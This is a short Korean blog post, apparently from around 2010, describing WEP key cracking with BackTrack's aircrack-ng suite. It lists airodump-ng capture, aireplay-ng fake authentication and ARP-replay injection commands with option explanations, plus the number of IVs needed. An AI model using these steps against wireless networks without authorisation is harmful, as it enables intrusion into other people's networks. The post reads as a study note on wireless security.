예전에 WEP Key를 크랙했을 때의 자료를 정리해 올려본다.
WEP Key가 깨진것은 쫌 오래된 일이다. 이젠 그리 놀랍지도 않지만, 요즘 무선랜을 공부하는 중에 자료가 있어 정리해 본다.
WEP Key 크랙에 필요한 툴들은 backtrack에 다 있다.
무선 랜카드를 구하는게 문제다.
무선랜카드: Linksys WUSB54G v4 (chipset:Ralink rt2570)
#>airodump-ng –w [save_file_name] rausb0 --channel 1
[airodump-ng 옵션]
-c(--channel): 무선 네트워크의 채널
--bssid: 공격하고자 하는 AP의 MAC 주소
-w: IVs들이 담길 파일 이름
rausb0: 인터페이스 이름
#>aireplay-ng -1 0 –e [ESSID] –a [AP_MAC_addresss(BSSID)] –h [MY_MAC_address] rausb0
위와 같이 페이크 인증을 해야 한다. 페이크 인증이 되지 않으면 packet injection이 되지 않아 IVs패킷을 모으는게 힘들어 진다.
[aireplay-ng 옵션]
-1: fake authentication
0: 초당 재연결 시간
-e: ESSID
-a: AP의 MAC 주소
-h: 자신의 랜카드 MAC 주소
Rausb0: 인터페이스 이름
-3: arpreplay 모드
-b: 공격할 AP MAC
#>aireplay-ng -3 –b [AP_MAC_address(BSSID)] –h [MY_MAC_address] rausb0
--> 패킷의 량을 증폭시킨다. 아래화면을 보면 갑자기 패킷량이 증가함을 알 수 있다.
--> 획득한 패킷을 크랙한다.
보통 128bit WEP Key를 크랙하기 위해서는 40,000~85,000개의 IVs값이 필요하다.
'Security > Wireless' 카테고리의 다른 글
[Wireless] WifiCake for WPA(2) cracking (0) | 2010.08.24 |
---|---|
[Wireless] 크랙한 WEP KEY로 무선 인터넷 연결 (0) | 2010.08.20 |
[Wireless] Backtrack4에서 kismet 실행시키기 (0) | 2010.08.20 |
[Wireless] 무선네트워크 키 값이 저장된 레지스트리 (0) | 2010.08.18 |
[Wireless]iptime 무선랜카드 제품 칩셋 (0) | 2010.08.16 |